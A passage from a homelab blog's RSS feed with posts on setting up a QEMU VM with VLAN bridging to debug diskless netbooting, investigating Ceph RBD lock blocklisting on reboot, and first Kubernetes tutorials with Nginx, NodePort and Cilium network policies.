what happens when I remove the &ldquo;Ceph&rdquo; taint I currently plan to put onto them.
But to make that decision, I will have to look more deeply into how Kubernetes
scheduling and especially preemption works.</p>
<p>The final act of the migration will be updating all docs (&#x1f91e;),
removing Nomad/Consul setups from my Ansible playbooks and finally shutting down
the VMs and retiring the x86 host again.</p>
<p>For this entire migration, to make sure I do not forget anything, I have
also created no less than 698 tasks in my favorite task management software,
<a href="https://taskwarrior.org/">Taskwarrior</a>.
I&rsquo;m accepting bets on how many tasks
in I will have to nuke the plan and start fresh. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Interlude: Setting up a VM to work on netboots</title>
      <link>https://blog.mei-home.net/posts/testvm-for-netbooting/</link>
      <pubDate>Tue, 28 Nov 2023 22:43:30 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/testvm-for-netbooting/</guid>
      <description>How I set up a VM on my workstation to work on netboot scripts more comfortably</description>
      <content:encoded><![CDATA[<p>As I&rsquo;ve noted in <a href="https://blog.mei-home.net/posts/netboot-prob-virtualbox/">a recent post</a>,
I&rsquo;ve had a problem with my diskless netbooting hosts sometimes needing several
boot attempts to come up again.</p>
<p>In this article, I will describe a short setup for virtual machines to debug
such a problem.
I&rsquo;ve chosen to do it via virtual machines instead of one of my physical hosts
because it makes a lot of things easier. Chief amongst those the fact that
with a VM, I&rsquo;m able to look at the boot process a lot more easily than with a
physical host, which are all headless in my setup. It also allows for faster
iteration, because most of my physical Homelab hosts are Raspberry Pis and hence
a bit on the slower side.</p>
<p>In this post, I will also be advising against the use of <em>VirtualBox</em>, as it
produced a lot of problems which did not appear with a QEMU VM.</p>
<h2 id="network-setup">Network setup</h2>
<p>Before I could start setting up the VM, I needed to do some network changes. My
desktop, where the VM was supposed to run, was in a different VLAN, and hence in
a different broadcast domain than my <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/#dnsmasq-and-tftp">DNSmasq proxy DHCP server</a>,
which handles netbooting in my Homelab. As a consequence, I would not be able to
use that server without some changes.</p>
<figure>
    <img loading="lazy" src="network-diagram-netboot-vm.svg"
         alt="A network diagram. It shows two switches, the OPNsense logo, a stylized PC and a stylized server. Red arrows, labeled &#39;Homelab VLAN&#39; go from the server, to the first switch, from there to the second switch and from that switch to the OPNsense logo. Green arrows go from the PC to the second switch and from there to the OPNsense logo. Those green arrows are labeled &#39;Management VLAN&#39;."/> 
</figure>

<p>The above diagram shows an approximation of the relevant parts of my home network.
There is no access from the Homelab VLAN to my workstation, and my workstation
needs to go through the OPNsense router to reach the Homelab.</p>
<p>What I did not want to do was to add my workstation to the Homelab VLAN. That
would honestly just feel wrong.</p>
<p>At this point, the switch port my workstation hangs off of strips all packets
coming in from the management VLAN of their VLAN header, and tags on the VLAN
ID of the management VLAN to all incoming packets from my workstation.</p>
<p>To now run a VM on my Homelab VLAN from that machine, I added the switch port
to the VLAN, but did not configure stripping of the VLAN ID for outgoing packets.
This meant that the main NIC device on my workstation would never see the
packets coming from the Homelab VLAN, because those packets would not be
forwarded anywhere by the kernel if there are no devices configured for that
VLAN ID.
And because the machine sends out packets without VLAN tagging, the switch would
add a VLAN header with the management VLAN ID.</p>
<p>So the first thing to do was to create a Linux device which listens for packets
with the Homelab VLAN ID. I did it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ip link add link eth0 name eth0.100 type vlan id <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>ip link add name vlanbridge type bridge
</span></span><span style="display:flex;"><span>ip link set dev vlanbridge up
</span></span><span style="display:flex;"><span>ip link set eth0.100 master vlanbridge
</span></span><span style="display:flex;"><span>ip link set dev eth0.100 up
</span></span></code></pre></div><p>Let me try my hand at another illustration of this setup.</p>
<figure>
    <img loading="lazy" src="linux-vlan.svg"
         alt="A diagram of a Linux VLAN setup with a network bridge. There is a large box titled &#39;Workstation&#39;. At the border of this box sits a smaller box called &#39;eth0&#39;. Into this box go two arrows from outside the large &#39;workstation&#39; box. One red labeled &#39;Homelab VLAN&#39; and one green labeled &#39;Management VLAN&#39;. Inside the Workstation box, the green Management VLAN arrow leaves the &#39;eth0&#39; box and goes into another small box called &#39;userspace&#39;. The red arrow leaves &#39;eth0&#39; as well and goes into a box &#39;eth0.100&#39;. It leaves that box again and enters a network switch symbol, labeled &#39;bridge&#39;. The last red Homelab VLAN arrow leaves the network switch symbol again and points into a final box labeled &#39;VM&#39;."/> 
</figure>

<p>This setup provides a bridge inside the network stack the VM can use like a real
switch. Only packets marked with the Homelab VLAN ID will ever reach the VM,
and all packets the VM sends will be send out via the <code>eth0.100</code> interface,
meaning they will all get tagged with the VLAN 100 ID. If I&rsquo;m not mistaken, this
setup should still completely isolate my own OS while also allowing the VM to
be in VLAN 100, the Homelab VLAN.</p>
<h2 id="setting-up-virtualbox">Setting up VirtualBox</h2>
<p>Up to this point, VirtualBox has always been my go-to VM tool for quick and
dirty work on my desktop. That has changed now.</p>
<p>When setting up the VM, I chose the network bridge option in VirtualBox&rsquo; config.
At the beginning, this seemed to be working. I had configured the VM to netboot,
and after the aforementioned network re-config, the machine was able to netboot
as intended.</p>
<p>But that was about all that worked. When logging into the VM for the first time
via SSH, I already felt a pretty strong lag. Which was ridiculous, considering
that it was running on a pretty potent CPU. I started an <code>apt get upgrade</code> anyway.
It was slow. Incredibly slow. And then it seemed to hang. SSH logins via another
terminal also hung.</p>
<p>After a reboot and a look at the kernel logs, I saw messages like these:</p>
<pre tabindex="0"><code>rbd: rbd0: encountered watch error: -107
rbd: rbd0: failed to unwatch: -110
systemd[1]: systemd-journald.service: State &#39;stop-watchdog&#39; timed out. Killing.
INFO: task kworker/u20:5:8900 blocked for more than 241 seconds.
nfs: server ceph-nfs.mei-home.net not responding, still trying
nfs: server ceph-nfs.mei-home.net OK
</code></pre><p>Here, <code>rbd0</code> is my Ceph RBD network attached root volume. I had never before
seen anything like this on any of my netbooting machines. The NFS failures also
indicated some sort of network problem, because none of the other 15 hosts using
the same NFS mount had any similar problems.</p>
<p>I finally gave up in resignation and conceded that it was Wireshark o&rsquo;clock.
And there it was.</p>
<pre tabindex="0"><code>1203	29.585824182	10.86.5.132	10.86.5.61	TCP	82	[TCP Dup ACK 1184#1] 5201 → 34502 [ACK] Seq=1 Ack=38 Win=65152 Len=0 TSval=4133901370 TSecr=2383831004 SLE=14518 SRE=15966
1204	29.585880097	10.86.5.61	10.86.5.132	TCP	1518	[TCP Retransmission] 34502 → 5201 [ACK] Seq=38 Ack=1 Win=64256 Len=1448 TSval=2383831070 TSecr=4133901370
</code></pre><p>Lots and lots of re-transmissions from my VM to a number of different Ceph hosts,
and the VM seeing a lot of what it considered duplicate ACKs coming from the
Ceph hosts.</p>
<p>Next, I tried to verify the problem with <code>iperf</code>. In the direction from the VM
to several hosts in my Homelab, I was not able to get beyond 1.5 MBit/s. Way
below my local 1 GBit/s network speed.
Next, I tried the other direction, from several Homelab hosts to the VM. And
that direction worked without any issue at all.</p>
<p>The final straw for VirtualBox came when I ran the same <code>iperf</code> tests from
the host OS, but via the same <code>eth0.100</code> device. And I got almost the full speed
in both directions.</p>
<p>Side note: I also got a relatively high number of retries shown by iperf here,
but they did not seem to impact the performance.</p>
<p>So with that I concluded that maybe VirtualBox was broken in some way for this
particular setup.</p>
<h2 id="qemu">QEMU</h2>
<p>I decided to try it a different way: Using QEMU instead of VirtualBox, just
to see whether that worked better. And it did.</p>
<p>For launching the QEMU VM, I adapted <a href="https://gist.github.com/gdamjan/3063636">this script</a>
I had already used when I worked on my initial netboot setup.</p>
<p>I adapted it a little bit, to also integrate the setup and teardown of the
necessary networking devices, so I had everything in a neat package. It looks
like this now:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#75715e"># Source: https://gist.github.com/gdamjan/3063636</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>MEM<span style="color:#f92672">=</span><span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>LAN<span style="color:#f92672">=</span>eth0
</span></span><span style="display:flex;"><span>VLANID<span style="color:#f92672">=</span><span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>VLAN<span style="color:#f92672">=</span>eth0.$VLANID
</span></span><span style="display:flex;"><span>VMIF<span style="color:#f92672">=</span>vmif
</span></span><span style="display:flex;"><span>BRIDGE<span style="color:#f92672">=</span>br
</span></span><span style="display:flex;"><span>ARCH<span style="color:#f92672">=</span>x86_64 <span style="color:#75715e"># i386</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> start_vm <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  /usr/bin/qemu-system-$ARCH <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -enable-kvm <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -m $MEM <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -boot n <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -bios /usr/share/edk2-ovmf/OVMF_CODE.fd <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -smp <span style="color:#ae81ff">4</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -net nic,macaddr<span style="color:#f92672">=</span>00:11:22:33:44:55 <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -net tap,ifname<span style="color:#f92672">=</span>$VMIF,script<span style="color:#f92672">=</span>no,downscript<span style="color:#f92672">=</span>no
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> setup_net <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  ip tuntap add dev $VMIF mode tap
</span></span><span style="display:flex;"><span>  ip link add link $LAN name $VLAN type vlan id $VLANID
</span></span><span style="display:flex;"><span>  ip link add name $BRIDGE type bridge
</span></span><span style="display:flex;"><span>  ip link set $VLAN master $BRIDGE
</span></span><span style="display:flex;"><span>  ip link set $VMIF master $BRIDGE
</span></span><span style="display:flex;"><span>  ip link set $BRIDGE up
</span></span><span style="display:flex;"><span>  ip link set $VLAN up
</span></span><span style="display:flex;"><span>  ip link set $VMIF up
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> reset_net <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  ip link set $VMIF down
</span></span><span style="display:flex;"><span>  ip link set $VLAN down
</span></span><span style="display:flex;"><span>  ip link delete $VLAN
</span></span><span style="display:flex;"><span>  ip link delete $BRIDGE
</span></span><span style="display:flex;"><span>  ip tuntap del dev $VMIF mode tap
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>setup_net
</span></span><span style="display:flex;"><span>start_vm
</span></span><span style="display:flex;"><span>reset_net
</span></span></code></pre></div><p>The only addition compared to the setup for VirtualBox is the <code>tuntap</code> interface
for use by the VM, which is also added to the bridge interface.</p>
<p>I also added a hardcoded MAC address to the VM, so that I could use that to
configure netbooting for it.</p>
<p>This setup worked without any issue whatsoever and has served me well in further
work on my netboot setup.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I still don&rsquo;t know what was wrong with VirtualBox. I seem to remember that I
did not have these kinds of problems during earlier netboot testing.</p>
<p>Sadly, this setup did not really help me to figure out my original netboot
problem, because I was not able to reproduce the reboot problem even once on
the VM, similar to my reproduction failure on my test Pi.</p>
<p>But the setup was still worth it, as it served me well during the implementation
of better logging for the netboot process for my netbooting hosts, which I will
detail in the next post.</p>
<p>If any of you have any idea about what the VirtualBox problem might have been,
or you have a good SOP for investigating those retries iperf was showing me
between my workstation and my Homelab hosts, please don&rsquo;t hesitate and contact
me <a href="https://social.mei-home.net/@mmeier">on Mastodon</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Investigating my Netboot problems</title>
      <link>https://blog.mei-home.net/posts/netboot-prob-virtualbox/</link>
      <pubDate>Thu, 16 Nov 2023 22:01:16 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/netboot-prob-virtualbox/</guid>
      <description>Turning it off and on actually fixes the problem</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve had a problem for quite a while now. As a reminder, I&rsquo;m booting eight
Raspberry Pi CM4 and one <a href="https://shop.udoo.org/en/udoo-x86-ii-ultra.html">Udoo x86 II</a>
completely diskless, using boot partitions on NFS, PXE netboot and the Pi&rsquo;s
netboot feature with root disks being supplied by Ceph RBD volumes.
If you&rsquo;re interested in the details, I&rsquo;ve got an <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">entire series on the setup</a>,
as well as a separate article describing the <a href="https://blog.mei-home.net/posts/udoo/">Udoo boot setup</a>.</p>
<p>This worked very nicely for quite a while and did exactly what I wanted. But it
has one problem that&rsquo;s been eluding me for a long time now: The hosts don&rsquo;t
always come up again after a poweroff or a reboot.</p>
<p>My initial theory was that that is a problem with <a href="https://docs.ceph.com/en/latest/rbd/rbd-exclusive-locks/">Ceph&rsquo;s blocklisting</a>.
For Ceph RBDs, you can enable a feature called <em>exclusive locks</em>. This feature
means that there is only one large lock for an entire volume, which is by default
never given up. This improves performance slightly, because Ceph knows that no
other client will suddenly want to mount that particular volume.</p>
<p>To protect those volumes from concurrent access, that lock needs to be acquired.
But, one of the standard problems with locking rears it&rsquo;s head here as well:
What happens when the lock holder crashes? For these cases, Ceph allows locks
to be broken. This is a good mechanism to not perpetually block a volume.</p>
<p>But, what happens when the original lock holder did not completely crash, but
instead just hung for a while and then continues processing as if nothing happened?
It wouldn&rsquo;t know that the lock has been broken, and with exclusive locks enabled,
it wouldn&rsquo;t check whether it still held the lock. And why would it, from its PoV
nothing untoward happened.</p>
<p>So now you&rsquo;d have two clients thinking they hold the lock. Bad things might
happen. To prevent this, Ceph doesn&rsquo;t just break the lock. It also blocklists
the original lock holder for a while, so it can&rsquo;t make any writes to the RBD
volume.</p>
<p>This is a good approach I think. Unless you&rsquo;re running a diskless setup like mine.
As I noted, the hosts are completely diskless. They fetch an initramfs via
netboot, launch into it, and inside the initramfs I mount the RBD root volume.
I&rsquo;m genuinely proud of this setup. Realizing that an initramfs was just an
assortment of shell scripts was one of those great learning moments in my Homelab
experience.
But it has a downside, namely shutdowns. During shutdown, the root partition
cannot be unmounted completely. As a consequence, I also can&rsquo;t unmap the RBD
volume. Shutdowns/reboots still work, though. But during the reboot, the attempt
to map the RBD volume again will find that another client still holds the lock.
Ceph will then break that lock, but in the course of doing so, it will also
blocklist the previous client. Which has the same IP as the new client.</p>
<p>My working theory until recently was then: During boot, the host breaks the
Ceph lock, but at the same time, it puts itself onto Ceph&rsquo;s blocklist, and then
fails to map the RBD volume, consequently failing to boot.
To fix the problem, I found that it works to issue a <code>ceph blocklist clear</code>
command at the right time.</p>
<p>But I&rsquo;ve always had a sliver of doubt about that theory, because at any given
reboot, e.g. during general system updates, only some netboot hosts, always a
minority, would fail. Most of them would reboot without issue, but all of them
would create blocklisting entries for themselves.
And I would then sit there and try to get the failed hosts to boot cleanly
by switching them off and on again while basically issuing <code>ceph blocklist clear</code>
in an endless loop.</p>
<p>The nagging feeling in my head, for a while now, was that perhaps that was a bit
of cargo culting. I was clearing the blocklist, and then the hosts booted again.
But I always ignored the fact that sometimes, I had to go through the process
multiple times before the machine finally came up again. So perhaps, it was just
the repeated reboots which fixed whatever issue I have?</p>
<p>It doesn&rsquo;t help that I don&rsquo;t have a good way to look at the console output of
my netbooting machines. Then there&rsquo;s also the fact that I could never reproduce
the problem with a fresh Pi not mounted in the rack but sitting on my desk with
a screen attached.</p>
<p>I finally reached the level of annoyance which made me put away my Kubernetes
project and get to the bottom of this issue. I set up a VM on my desktop to make
debugging easier than it is with a Pi. I will write up that story soon, just
take this from me for now: Keep your hands away from VirtualBox. :angry_face:</p>
<p>With the VM setup, I got the same results as I got with a fresh Pi: Yes, the
machine blocklisted a client during reboot, but still didn&rsquo;t have a problem
mapping the RBD volume and booting up properly. Just that now, I could watch the
entire process. And there doesn&rsquo;t seem to be anything wrong. As expected, I get
the lock breaking, and then everything works as normal.</p>
<p>This has me pretty much convinced that something else is going wrong. So instead
of going with my original plan, which was just to add a <code>ceph blocklist clear</code>
to the initramfs root mount script, I will first introduce some better logging.</p>
<p>This means implementing <a href="https://www.kernel.org/doc/Documentation/networking/netconsole.txt">netconsole</a>
for all netbooting machines and then gathering those early boot logs in my
FluentD instance.</p>
<p>My biggest fear is that once I&rsquo;ve set that up, all my hosts will suddenly stop
having the problem and I will never ever get those logs I need. &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>KubeExp: Day 1 operations</title>
      <link>https://blog.mei-home.net/posts/kubernetes-day-1/</link>
      <pubDate>Thu, 19 Oct 2023 15:49:58 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/kubernetes-day-1/</guid>
      <description>The first couple of steps with my new Kubernetes cluster</description>
      <content:encoded><![CDATA[<p>In the <a href="https://blog.mei-home.net/posts/kubernetes-cluster-setup/">last post</a> of
<a href="https://blog.mei-home.net/tags/kubeexp/">the series on my Kubernetes experiments</a>, I
described how to initialize the cluster. In this post, I will go into a bit more
detail on what I did once I finally had a cluster set up.</p>
<h1 id="tutorials">Tutorials</h1>
<p>Never having done anything with Kubernetes before, I started out with a couple
of tutorials.</p>
<p>The first one was <a href="https://kubernetes.io/docs/tutorials/configuration/configure-redis-using-configmap/">this one</a>.
It uses Redis as an example deployment to demonstrate how to use ConfigMaps.
This is an interesting topic for me, because one of the things I liked a lot
about Nomad was the tight integration with <a href="https://github.com/hashicorp/consul-template">consul-template</a>
for config files and environment variables via the <a href="https://developer.hashicorp.com/nomad/docs/job-specification/template">template stanza</a>.
This stanza allows the user to template config files with inputs taken from other
tools. My main use case at the moment is taking secrets from Vault and injecting
them into configuration files.
Kubernetes does not have this capability out of the box, but I will get into
how I will do it further down in this post.
The one important piece of knowledge I gained from this tutorial was that when
a ConfigMap is used by the pod spec in a deployment manifest, the deployment&rsquo;s
pods are not automatically restarted to take the new configuration into account.
This is a bit annoying, to be honest, because it&rsquo;s something which Nomad does
out of the box, at least for certain ways of writing job files.
The solution I found for this (while working with pure <code>kubectl</code> at least,
using Helm the problem can be solved more elegantly) was to just run <code>kubectl rollout restart deployment &lt;NAME&gt;</code>.</p>
<p>Next up was a small tutorial setting up a Service for the first time <a href="https://kubernetes.io/docs/tutorials/services/connect-applications-service/">with Nginx</a>.
At first I had a little problem with this one, because I had written the
ConfigMap for it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nginxconfigmap</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">nginx</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">webserver</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">connecting-apps</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">usage</span>: <span style="color:#ae81ff">tutorials</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">default</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    server {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            listen 80 default_server;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            listen [::]:80 default_server ipv6only=on;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            listen 443 ssl;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            root /usr/share/nginx/html;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            index index.html;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            server_name localhost;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            ssl_certificate /etc/nginx/ssl/tls.crt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            ssl_certificate_key /etc/nginx/ssl/tls.key;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            location / {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    try_files $uri $uri/ =404;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }</span>
</span></span></code></pre></div><p>As a consequence, nothing came up in the Nginx container, but I also wasn&rsquo;t
getting any error messages in the logs. So I first assumed that something was
wrong with the Service setup, because I was getting &ldquo;Connection refused&rdquo; errors.
But it turns out I just didn&rsquo;t understand the ConfigMap semantics correctly.
The keys under the <code>data:</code> key are actual filenames. So in the setup above,
I was adding a file just called <code>default</code> and mounted it into the Nginx conf
directory. But in the main Nginx config, only files with the <code>.conf</code> extension
are automatically included from the config snippet dir. But because there wasn&rsquo;t
anything malformed about the config, I was simply getting an Nginx instance
without a server block, instead of some sort of error message. Just changing
that <code>default:</code> key to <code>default.conf:</code> fixed the issue.
This was also the first service I made available outside the cluster, using a
<code>NodePort</code> type service. It looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">connecting-apps-nginx</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">nginx</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">webserver</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">connecting-apps</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">usage</span>: <span style="color:#ae81ff">tutorials</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">NodePort</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">port</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">port</span>: <span style="color:#ae81ff">443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">https</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">nginx</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">webserver</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">connecting-apps</span>
</span></span></code></pre></div><p>This service listens on two random ports on every single Kubernetes node. If
packets arrive on those random ports, they are then forwarded to the Pod running
Nginx.
At first, I thought this would be the way I would be running my Traefik ingress
later on, but then I realized that while you can configure an explicit port for
NodePort services, they can only have port numbers &gt; 30000.</p>
<p>Next, I had a look an example <a href="https://docs.cilium.io/en/stable/gettingstarted/demo/">from Cilium</a>,
to get more comfortable with Network Policies. In this example, you launch a
number of Star Wars themed services, deciding docking permissions for the Death
Star. This is simulated with CiliumNetworkPolicy objects and was pretty good
at teaching me the basics there. I&rsquo;m especially interested in NetworkPolicy as
a network connection permission mechanism. In my Nomad cluster, I&rsquo;m using
Consul Connect to control the connections between different services, deciding
who can connect to who, and I wanted something similar in Kubernetes.
<a href="https://kubernetes.io/docs/concepts/services-networking/network-policies/">NetworkPolicies</a>
do exactly that, and this nice Star Wars demo from Cilium demonstrated that.</p>
<p><a href="https://kubernetes.io/docs/tutorials/stateless-application/guestbook/">The last tutorial</a>
was more of an &ldquo;all-in-one&rdquo; deal with a lot more complexity, connecting several
services to each other. I made it even more interesting by instituting a deny
all network policy on the &ldquo;default&rdquo; namespace. As a consequence, I needed to
make sure that both, the Redis pods could talk to each other for replication,
and that the PHP frontend could talk to the Redis pods. After having just finished
the Cilium demo, that part was pretty simple. What I overlooked completely:
I also had to explicitly allow traffic from outside the cluster to reach the
frontend, which I could do with a policy like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;guestbook-redis-allow&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">guestbook-redis-allow</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">guestbook</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">usage</span>: <span style="color:#ae81ff">tutorial</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;L3-L4 policy to restrict redis access to frontend only&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">key-value-store</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">guestbook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">guestbook</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">frontend</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">guestbook</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">toPorts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">port</span>: <span style="color:#e6db74">&#34;6379&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>Without this, Cilium dutifully blocks all external traffic coming in via the
NodePort service I had configured for the tutorial.</p>
<h1 id="how-to-handle-all-those-manifests">How to handle all those manifests?</h1>
<p>While doing the tutorials, I started wondering how to handle all of those
Yaml files - in some better way than running <code>kubectl apply</code> for every one of
them. At first I looked at Helm, which already looked more like what I wanted.
But then somebody on Mastodon mentioned <a href="https://helmfile.readthedocs.io/en/latest/">Helmfile</a>.
